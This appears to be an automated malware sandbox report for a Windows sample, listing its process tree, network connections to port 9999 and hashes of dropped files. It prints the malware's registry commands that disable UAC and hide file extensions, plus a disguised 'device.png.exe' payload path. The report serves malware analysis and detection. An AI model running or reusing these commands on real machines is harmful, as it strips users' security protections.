cmd /c ""C:\Users\Admin\AppData\Local\Temp\LiUowIsI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-22370143419090483471510901341419627714-20395939212068521532153077058-1564734625"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\LQQAcMgQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "377879575-1202911604-1930378794-423241462-1308409258-1135788462305048294-86383817"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\aGMoQUgw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\qOIoIAMY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1653237630523632968-780773843297890839-351182943285675971203648498319006748"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "601484009-19340068141947020156461726530-8218668431163020947-963292442543469356"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\KokEIMgE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZWkkcUQo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1204430981613066144-1137214729-174368645119626615812298479401301028227-385536489"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-16429557876778464-1423795083-1223911596637218386-26107974118311610561844969716"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "274332885643631700-1073421658-158725767459938022818057630431115498082-221619465"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1741733654-12779567751953693818-52518267-20682039311131976044-791103077-1499857222"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\LascIQcM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "791578749-1052162916-1197602497924621078-1676167181-75723629914409032838796298"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1313776710-127748642013840550865820095341135956919-14188991071909625302-1109916457"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-134317576016337122-1770672522-11148093209658151191996804778-3586157782065839472"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\vuMccQEQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "369435502-984855316-17474034612140319024-9061923969936491358514289-1737450480"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1056316033-203156177511906096231370390908-1025415278-15647663691405620824-223761642"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\GQgMUcoo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-510479764-132276419-16094870781672261372184175319-1745346043-331252519-251989061"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\aQEIoEYo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-136769349997536416264543926117786159727187928611249733029-1033060719-2144830181"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\wSIwswIA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\gUwcgUMQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zyAYMkMI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "117920964420539522718499216341650678781-19937889751720336510-884698817-1853840851"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zuoYsAcA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "988707844415915722-609243999-327066083-1665363118-1192982968-1999682685167566459"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-16644747351746314424-8060752141473244612-698105996-428804660-2799125271062821770"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\hcQQYoUY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-11050572231544981268759397333-373549152-2004014128931458152-991365174-455273832"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1693863997-620914136-173626340-1244531357-20631061491070059639310689854370032224"

Network

Country  Destination          Domain      Proto
BO       200.87.164.69:9999               tcp
US       8.8.8.8:53           google.com  udp
GB       172.217.16.238:80    google.com  tcp
BO       200.87.164.69:9999               tcp
GB       172.217.16.238:80    google.com  tcp
BO       200.119.204.12:9999              tcp
BO       200.119.204.12:9999              tcp
BO       190.186.45.170:9999              tcp
BO       190.186.45.170:9999              tcp

Files

SHA512 c2635360de0d3bf769bed926add6840452eb7bb31416be9a1d1a721d878fbeae998a471a73b548faf86e8dc2ca96bae071cd19a6342e3fad458f7857e5623242

memory/2088-1308-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2168-1317-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2648-1307-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AwoU.exe

MD5 8c53b1abddd6bda0bd0e5cfeda53ce47
SHA1 c9083a1f2e43e1f7bea829c4ceb58bdd3e7009c4
SHA256 413e1c4c96a35ec527d0888993c1fc977f2e0770836f5835f1ae67663f6e72fb
SHA512 ce9a0093666eb9d509e1aae653de3219628e112c9e9bf572356c665c3868c0d2b960c1a5586d0ba09d559c1ac0968779c0ba895ec1b76b5f97ec4529ca583961

memory/2648-1306-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cwkw.exe

MD5 e9c7de071ed615d628be3fbd0a307f7b
SHA1 a62393542811d048ec440981f0a60d26a98a9f7e
SHA256 9755220cebbd4004ec13b7ef182e94510058acdcc1b4ab6a9436e85155bf120b
SHA512 b3933dbd29d530bceff2ade057faed2ac245712552a9e88cdf69129c5295ae5628f7c6ae991097711d91e6ec14b2a644ccc46cf32a4bc24e6b74457c3b672d9f

C:\Users\Admin\AppData\Local\Temp\wYMW.exe

MD5 98081f4356b11133105d516b1c3d3049
SHA1 926cbfb72196ec39244cae0f5b8fbfe12c27610e
SHA256 f16c21da73411a457eb69957797f0bf49c00ab40c4854e958d183c7ac15593b6
SHA512 a5ddc27e83032b4979e43ff14bdb06f8043ef690d7aa1a1440cc3738567bd42cb123d48eb9aa306254ff68d618d02de0a596eb7421085bb87bdc237f1fffd831

C:\Users\Admin\AppData\Local\Temp\giQIAIUw.bat

MD5 ee97ec9deada285c3d6626eb43997976
SHA1 abc87ec5abc92f782ed4bf05417a54e2cafc43c3
SHA256 8213240e1b577d220b29d84c34a3dea0527b258b7568409016a4564b29ee174b
SHA512 e73f1ff0f9d217c2a3a9e9e90b314b29cb196ede0e645d8dd45ce76002d5b93efd2090c80bd1e5d7354c8745dc148f406fb7f0c95b37915f42f35c5c5f09e683

C:\Users\Admin\AppData\Local\Temp\kgQk.ico

MD5 0e6408f4ba9fb33f0506d55e083428c7
SHA1 48f17bb29dcd3b6855bf37e946ffad862ee39053
SHA256 fee2d2cfa0013626366a5377cb0741f28e6ec7ac15ef5d1fc7e286b755907a67
SHA512 e4da25f709807b037a8d5fb1ae7d1d57dfaf221379545b29d2074210052ef912733c6c3597a2843d47a6bf0b5c6eb5619d3b15bc221f04ec761a284cc2551914

C:\Users\Admin\AppData\Local\Temp\esMc.exe

MD5 88b6026d76efff228d1f315276b51cbd
SHA1 ab925f88d73ae4c8fbde102fdb3b2abeb5c4b2b0
SHA256 35744388c4e191d0bbe8b6ced3b89686fc57c4e620333e83ad1e06aad19e6e6b
SHA512 896c58299900e9201af6254bbbbfc1997cee21b8da224f8c128b911fc73cc0bac25c3761ad15ff1d24a2095c829674666277fa10612665b0ca1106a213f64d43

memory/1724-1380-0x0000000000120000-0x000000000013F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\UkQS.exe

MD5 d6f27411821c05092be3dd37edb1fe30
SHA1 c66e1221a429812aee8191e33ff2764e9f9d8da6
SHA256 1a535013b3b440a4df282e4889830c3f73da9f347caadd87774b445c73925e78
SHA512 2c4fc0c1857831531b6a058fd23eb7ec635477b1a2699aa3a627295da42bfb578c712e0e4d5514093e29d25f255658701421b2dacceaeefa6ff3e5ada61a3dff

C:\Users\Admin\AppData\Local\Temp\AkQYIoAM.bat

MD5 a391117976d6bb435309c6a26614cf7a
SHA1 1eeb85dc5292e9cceb2e3afb5a9a74b0636c46ed
SHA256 b0415dac4c608a75e19ed44ab387d5d33020048cccdb9056804d642a763272f6
SHA512 ff7f1cb066ffb2e7f31e0e1be541b8a0bae54d40923cf369e1e273cce31f959d48ca01d34381ae1fb6005482f1cfc34f8743fea81347bfce7865da051d5cc3b0

C:\Users\Admin\AppData\Local\Temp\WUQI.exe

MD5 235d3a866b324206e85452912c17ad98
SHA1 68cf123c61d51408d5c96e02790f344ca9c0e482
SHA256 4e1c1b326f543d6994f1a6cf635d7a1e319952a27ead8afbb74e2663f5ecd341
SHA512 32a6311d2ea773e6fd7e97f9484b411d1a6debe291cc7d6c98403488131ef7711ff48523b8bddd06b9150e971e57caf923986a4d19c281ed83c13cae933964b6

C:\Users\Admin\AppData\Local\Temp\cQQI.exe

MD5 24b01db0e3fea78689865cf3023a12f5
SHA1 5ba87c719d9baef460cf17bea63551107c503f4a
SHA256 983da5f1fdc6e021f4748064082a7fc76c85434ba90762087559b782cab6366e
SHA512 62e309cb11e78e5b8884e3cbd6012bc699a8d97a6bdc2a89c6d8c567f3bc180891708a20ffc8fedd2d5c67d81517e3290c31648057f299e2e3577395a09edae0

C:\Users\Admin\AppData\Local\Temp\AgIQ.exe

MD5 c21575ed7378ca47cc5846a1d35e68a1
SHA1 635ecd135e24f8e1f9ed0fb9843c41aaeaecec2f
SHA256 f9d18b5757396bfc0d28dd5b6466bd26402b6fcc16245170a7732e495021eb2e
SHA512 f85989fc615dd18bda90d9e21d3a300eb3f97f7eb0cd9758767efbe40de2c8dba71235ce6f032c656dca92e3149dc89538eabc3c2366cc037e377b34293e090b

C:\Users\Admin\AppData\Local\Temp\iIkQ.exe

MD5 a7cca9560acebaa8b8c8675c0f2b3387
SHA1 f310da3a2d37628e713596de7d838f64f3eaa17e
SHA256 7a42d3e786866e1524ba3b011cda841ab488daaee78a93d417fd860563997795
SHA512 6356d8fd08ca43678f1b77588126d4a558e49fbbf07ca33d219c91ddab5efc21777bb62bd9b2f30818aacd43d486665987870f24ad5f30e086208b2ceee11c24

C:\Users\Admin\AppData\Local\Temp\ESEMUkUc.bat

MD5 47b69391cad46e61cc719bc6749f0b19
SHA1 482b431a7c962f4fbc9db6570f50989145e80059
SHA256 6eb0b99a2a92f5e1451ab4e744d24fa104ad447ddbf900aee666c9d4cd81e003
SHA512 cad4975ebf46fb59e97bc079b1f5d1b5a5a734e76d555428744ad28aff0514c2ffa2d98fe29e8ccb29aa6e4b971e2dd6ba690fc57986a6c582be4148f127a426

C:\Users\Admin\AppData\Local\Temp\AYMA.exe

MD5 1354b8b686c2544839bfe0218d71d073
SHA1 a1df2df6523c63bafccd60c3154aa7f6cecff789
SHA256 06b9d14315601b22bfa4c1455e3d4d374a2fceef1a35a78c886aa9a395889021
SHA512 828bc9c76335f6de51a655fa9c636bc68e56856417bcdc892543e33828057ba24f8e5ff87a8e160e2628ff256fff146cc5d97af75f3de4c7ee4722f6e0b0adfe

C:\Users\Admin\AppData\Local\Temp\MkoO.exe

MD5 77392fe983b14b761b62b97d30d74e4d
SHA1 16e46d274b80bb17732b2a1dc09938937e0ad99f
SHA256 d685e41ce064ed5445268c67a8eec19a316cd6b3464e34f11bbc817e2f566259
SHA512 5d24c948d5a5eb681c8ac084ceb24170d097a72af033677b89f08c9f4e0227ee5433b20507a6a09df0cbb6dc26889f16e3a4df11bcc1c4225380d98fe12414ef

C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.exe

